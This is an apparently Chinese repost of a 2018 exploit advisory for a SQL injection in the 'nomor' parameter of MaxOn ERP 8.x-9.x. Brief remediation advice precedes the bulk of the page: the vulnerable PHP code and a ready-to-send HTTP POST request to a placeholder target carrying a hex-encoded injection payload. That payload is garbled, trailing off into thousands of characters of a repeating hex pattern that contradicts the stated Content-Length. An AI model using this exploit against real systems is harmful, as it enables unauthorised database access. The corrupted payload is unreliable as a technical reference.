MaxOn ERP 'nomor' SQL注入漏洞及PoC

漏洞概述 MaxOn ERP Software 8.x-9.x 版本存在 'nomor' SQL 注入漏洞。该漏洞允许所有用户执行 SQL 注入代码，具体位置在 的第350行和 的第414行。 影响范围 软件版本: MaxOn ERP Software 8.x-9.x 平台: PHP 测试环境: WIN7 x64/KaliLinux x64 漏洞类型: SQL 注入 修复方案 1. 代码审查与修复: - 检查并修复 和 中的 SQL 查询逻辑，确保对用户输入进行适当的过滤和转义。 - 使用参数化查询或预编译语句来防止 SQL 注入。 2. 更新软件: - 升级到最新版本的 MaxOn ERP Software，以获取最新的安全补丁和修复。 3. 安全配置: - 配置 Web 应用防火墙（WAF）以检测和阻止 SQL 注入攻击。 - 定期更新和维护系统，确保所有组件都是最新版本。 POC 代码 ```php Exploit Title: MaxOn ERP Software 8.x-9.x - 'nomor' SQL Injection Dork: N/A Date: 2018-10-15 Exploit Author: Ihsan Sencan Vendor Homepage: http://www.talagasoft.com Software Link: http://demo.maxonerp.com Software Download: https://datapacket.dl.sourceforge.net/project/maxon/maxon.rar Version: 8.x-9.x Tested on: WIN7 x64/KaliLinux x64 CVE: N/A Description All users can run sql injection codes. [PATH]/pos/controllers/User.php Line:350 [PATH]/application/controllers/User.php Line:414 function log_activity(){ $sql="select from syslog where l=1"; $nomor="";$jenis="";$user=""; if($this->input->post()){ if($nomor=$this->input->post('nomor')){ if($nomor!="")$sql.=" and no_bukti='$nomor'"; } if($user=$this->input->post('user')){ if($user!="")$sql.=" and userid='$user'"; } if($jenis=$this->input->post('jenis')){ if($jenis!="")$sql.=" and jenis_cmd='$jenis'"; } } $sql.=" order by tgljm desc limit 1000"; $data["user"]=$user; $data["nomor"]=$nomor; $data["jenis"]=$jenis; $data["syslog"]=$this->db->query($sql); $this->template->display("log_list",$data); } POC: 1) http://TARGET/[PATH]/index.php/user/log_activity POST /index.php/user/log_activity HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: ci_session=3ba3e8a3b02d8e489cd16703fa5d06327b84074c Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 253 nomor=272280414e44442045558554525241414354545641414c45554552032323232c43434f4e4e43414154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154415441544154

目标达成感谢每一位支持者 — 我们达成了 100% 目标！

MaxOn ERP 'nomor' SQL注入漏洞及PoC

同源更多文章

目标达成 感谢每一位支持者 — 我们达成了 100% 目标！

MaxOn ERP 'nomor' SQL注入漏洞及PoC

同源更多文章

目标达成感谢每一位支持者 — 我们达成了 100% 目标！